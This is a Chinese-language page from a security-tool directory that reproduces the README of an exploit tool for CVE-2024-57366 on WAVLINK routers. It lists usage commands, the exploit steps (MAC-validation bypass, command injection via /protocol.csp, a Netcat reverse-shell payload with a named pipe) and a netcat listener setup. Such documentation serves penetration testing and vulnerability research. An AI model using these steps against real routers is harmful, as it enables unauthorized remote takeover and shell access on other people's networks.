Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-57366 — 针对CVE-2024-57366的远程代码执行漏洞利用工具,通过MAC地址验证绕过和命令注入攻击WAVLINK路由器,具备自动WiFi注册和反向Shell有效载荷投递功能。 | Kitploit
工具/GitHubGitHub/h4ckusaur/cve-2024-57366
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用无线安全渗透测试命令与控制红队Payload 开发
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

针对CVE-2024-57366的远程代码执行漏洞利用工具,通过MAC地址验证绕过和命令注入攻击WAVLINK路由器,具备自动WiFi注册和反向Shell有效载荷投递功能。

311个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2024-57366 漏洞利用

一个针对CVE-2024-57366的强大漏洞利用程序,通过绕过MAC地址验证和命令注入,在易受攻击的路由器上实现远程代码执行。

这是一个后授权漏洞利用,需要路由器开启“远程控制”功能以及管理员密码。管理用户名硬编码为“admin”。

🚀 功能特点

  • 自动MAC地址注册 - 连接WiFi向路由器注册MAC地址
  • 保护网络连接的漏洞利用 - 在利用过程中保持现有网络连接
  • MAC地址缓存 - 使用缓存的成功MAC地址快速重复利用
  • BurpSuite兼容 - 匹配精确请求格式以最大可靠性
  • 超时处理 - 当预期反连shell连接时提供有用信息
  • 用户友好 - 简单的基于文本的MAC地址缓存,便于管理

📋 需求

  • Python 3.6+
  • 带有无线网卡的Linux系统
  • sudo 权限(网络接口管理所需)
  • 存在CVE-2024-57366漏洞的目标路由器

🛠️ 安装

  1. 克隆或下载漏洞利用文件
  2. 确保已安装所需的Python包:
    root@kitploit:~
    pip3 install requests
    

🎯 使用

基础漏洞利用(首次)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

快速漏洞利用(使用缓存的MAC)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# 脚本会询问:“是否使用缓存的MAC进行快速利用?(y/n):” - 回答“y”

强制完整利用(跳过缓存)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

列出缓存的MAC地址

root@kitploit:~
python3 exploit.py --list-cached

📖 命令行选项

  • --target - 目标路由器IP地址(默认:127.0.0.1)
  • --port - 目标路由器端口(默认:80)
  • --local-ip - 本地IP地址,用于反连shell回调
  • --local-port - 本地端口,用于反连shell回调(默认:4444)
  • --password - 路由器管理员密码
  • --ssid - WiFi网络名称(默认:WAVLINK-Mesh_DC4B)
  • --force-full - 强制完整漏洞利用,跳过缓存的MAC检查
  • --list-cached - 列出缓存的MAC地址并退出

🔧 工作原理

技术概述

CVE-2024-57366 利用路由器固件中的MAC地址验证绕过漏洞。该漏洞允许通过 /protocol.csp 端点中的 mac 参数进行命令注入。

漏洞利用过程

  1. 认证 - 从路由器提取认证令牌
  2. WiFi密码重置 - 重置路由器WiFi密码以匹配管理员密码
  3. MAC注册 - 连接WiFi以向路由器注册MAC地址
  4. 命令注入 - 使用已注册的MAC注入反连shell载荷
  5. 网络保护 - 全程保持现有网络连接

关键技术细节

  • MAC验证绕过:路由器通过检查MAC地址是否连接过WiFi来验证
  • 网络接口绑定:使用 eth0 接口保留原始网络环境
  • 请求格式:精确匹配BurpSuite格式(index=1,令牌在URL路径中)
  • 载荷:使用带命名管道的Netcat反连shell以确保可靠性

MAC地址缓存

漏洞利用程序自动将成功的MAC地址缓存到 successful_macs.txt:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

手动添加MAC:编辑 successful_macs.txt 并添加类似行:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 示例用法

首次漏洞利用尝试

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# When prompted to save MAC address, say "y"

后续漏洞利用(更快)

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# 当提示是否使用缓存的MAC时,回答“y”

🔍 故障排除

常见问题

  1. “未找到无线网卡”

    • 确保已启用无线网卡
    • 检查WiFi是否已打开
    • 尝试使用 sudo 运行
  2. “MAC地址验证失败”

    • MAC地址需要在路由器上注册
    • 确保WiFi连接步骤成功完成
    • 请先尝试手动连接WiFi
  3. “请求超时”

    • 这实际上可能意味着漏洞利用成功!
    • 检查你的netcat监听器是否有反连shell连接
    • 路由器可能正在执行命令但未响应HTTP
  4. “反连shell未连接”

    • 验证你的 --local-ip 是否正确(使用 ip addr show eth0)
    • 确保没有防火墙阻止连接
    • 检查netcat监听器是否在正确的端口上运行

网络需求

  • eth0接口:必须有一个IP地址用于网络保护
  • 无线网卡:初始MAC注册所需
  • 路由器访问:必须能够通过eth0接口到达路由器

📁 文件结构

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Main exploit script
├── successful_macs.txt     # MAC address cache (auto-generated)
└── README.md              # This file

⚠️ 免责声明

此工具仅用于教育和授权测试目的。仅在你拥有或获得明确测试许可的系统上使用。作者不对任何滥用此工具的行为负责。

🔗 参考

  • CVE-2024-57366
  • 路由器固件中的MAC地址验证漏洞
  • 通过 /protocol.csp 端点进行命令注入

📝 许可证

本项目按原样提供,仅供教育目的。请负责任地使用,并遵守适用的法律法规。

下载工具